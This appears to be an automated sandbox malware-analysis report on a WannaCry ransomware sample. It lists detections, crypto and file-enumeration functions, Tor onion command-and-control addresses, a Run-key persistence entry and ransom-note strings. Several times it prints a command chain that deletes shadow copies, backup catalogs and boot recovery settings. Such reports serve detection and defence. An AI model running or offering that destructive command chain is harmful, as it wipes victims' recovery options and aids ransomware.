Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\Desktop\tasksche.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8824, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\njyalyugfohc920

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET JA3 Hash - Possible Malware - Malspam - Source IP: 192.168.11.20 - Destination IP: 86.59.21.38

Timestamp:	2024-07-26T00:20:23.753112+0200
SID:	2028377
Source Port:	49751
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - Possible Malware - Malspam - Source IP: 192.168.11.20 - Destination IP: 188.165.131.206

Timestamp:	2024-07-26T00:22:41.799380+0200
SID:	2028377
Source Port:	49752
Destination Port:	9000
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - Possible Malware - Malspam - Source IP: 192.168.11.20 - Destination IP: 192.87.28.28

Timestamp:	2024-07-26T00:22:35.911095+0200
SID:	2028377
Source Port:	49750
Destination Port:	9001
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002A_126.EXE.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: TR/FileCoder.724645

Machine Learning detection for dropped file

Source: C:\@WanaDecryptor@.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LisectAVT_2403002A_126.EXE.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,	31_2_004049B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,	31_2_00404AF0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	31_2_00404B70
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004046F0 CryptImportKey,	31_2_004046F0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004046B0 CryptAcquireContextA,	31_2_004046B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	31_2_00404770
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,	31_2_004047C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,	34_2_004049B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,	34_2_00404AF0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	34_2_00404B70
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004046F0 CryptImportKey,	34_2_004046F0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004046B0 CryptAcquireContextA,	34_2_004046B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	34_2_00404770
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,	34_2_004047C0
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 36_2_00D3C797 abort,CryptAcquireContextA,CryptGenRandom,__stack_chk_fail,	36_2_00D3C797
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 36_2_00D35EA1 ERR_load_crypto_strings,OPENSSL_add_all_algorithms_noconf,SSLeay,SSLeay_version,strcmp,__stack_chk_fail,	36_2_00D35EA1

Source: taskhsvc.exe, 00000024.00000002.5904328503.0000000003ED4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_cdd69ad5-b

Source: LisectAVT_2403002A_126.EXE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\taskdl.exe	Code function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,	6_2_00401080
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,	31_2_004080C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,	31_2_00403CB0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,	31_2_004026B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,	34_2_004080C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,	34_2_00403CB0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,	34_2_004026B0
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Code function: 42_2_6F91C027 FindFirstFileExA,	42_2_6F91C027

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SD6DB9.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SD6DCE.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SD6DBA.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SD6DCC.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SD6DBB.tmp	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SD6DCD.tmp	Jump to behavior

Networking

Found Tor onion address

Source: @WanaDecryptor@.exe, 0000001F.00000002.5895321498.0000000000198000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
Source: @WanaDecryptor@.exe, 00000022.00000002.1950146110.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
Source: @WanaDecryptor@.exe, 00000022.00000002.1950994575.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C115p7UMMngoj1pMvkpHijcRdfJNXj6LrLngx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

Source: global traffic	TCP traffic: 192.168.11.20:49747 -> 167.114.35.28:9001
Source: global traffic	TCP traffic: 192.168.11.20:49749 -> 185.11.180.67:9001

Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.35.28
Source: unknown	TCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknown	TCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknown	TCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknown	TCP traffic detected without corresponding DNS query: 185.11.180.67
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.35.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.11.180.67
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.35.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.11.180.67
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.35.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.11.180.67
Source: unknown	TCP traffic detected without corresponding DNS query: 167.114.35.28
Source: unknown	TCP traffic detected without corresponding DNS query: 185.11.180.67
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 86.59.21.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28
Source: unknown	TCP traffic detected without corresponding DNS query: 192.87.28.28

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 31_2_0040DB80 recv,

31_2_0040DB80

Source: @WanaDecryptor@.exe, @WanaDecryptor@.exe, 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950373676.0000000000421000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001F.00000000.1847688235.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000001F.00000002.5896223024.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950373676.0000000000421000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: @WanaDecryptor@.exe, 0000001F.00000003.1866720891.0000000002858000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001F.00000003.1866570247.0000000002851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zlib.net/D
Source: @WanaDecryptor@.exe, 0000001F.00000003.1866830058.000000000295F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: @WanaDecryptor@.exe, 0000001F.00000003.1866830058.000000000295F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
Source: @WanaDecryptor@.exe, 00000022.00000002.1950994575.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
Source: @WanaDecryptor@.exe, 0000001F.00000002.5895321498.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950146110.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
Source: @WanaDecryptor@.exe, 0000001F.00000002.5896223024.0000000000421000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip(B
Source: taskhsvc.exe, 00000024.00000003.2143314663.00000000040AC000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000024.00000003.2147656639.000000000448B000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000024.00000003.2162919054.0000000003FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: @WanaDecryptor@.exe, @WanaDecryptor@.exe, 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000022.00000002.1950373676.0000000000421000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.google.com/search?q=how

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

Code function: 31_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,

31_2_00407C30

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	31_2_00407C30
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,	31_2_004035A0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00407C30 OpenClipboard,GlobalAlloc,CloseClipboard,EmptyClipboard,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,	34_2_00407C30
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,	34_2_004035A0

Spam, unwanted Advertisements and Ransom Demands

Detected Wannacry Ransomware

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!		31_2_004020A0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: CreateFileW,GetFileTime,ReadFile,ReadFile,ReadFile,ReadFile,ReadFile,CloseHandle,CreateFileW,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,WriteFile,SetFilePointer,SetEndOfFile,CreateFileW,ReadFile,WriteFile,_local_unwind2,SetFilePointerEx,SetEndOfFile,SetFileTime,CloseHandle,MoveFileW,_local_unwind2, WANACRY!		34_2_004020A0

Yara detected Conti ransomware

Source: Yara match

File source: Process Memory Space: @WanaDecryptor@.exe PID: 5284, type: MEMORYSTR

Yara detected Wannacry ransomware

Source: Yara match	File source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE
Source: Yara match	File source: 34.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.1848649309.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.1847688235.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.2071838543.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.5896071201.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1950334350.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_126.EXE.exe PID: 9188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: @WanaDecryptor@.exe PID: 5284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: @WanaDecryptor@.exe PID: 4800, type: MEMORYSTR
Source: Yara match	File source: C:\@WanaDecryptor@.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\u.wnry, type: DROPPED

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 31_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,		31_2_00407E80
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 34_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,		34_2_00407E80

Deletes shadow drive data (may be related to ransomware)

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.882205706.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.872152587.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1844791357.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
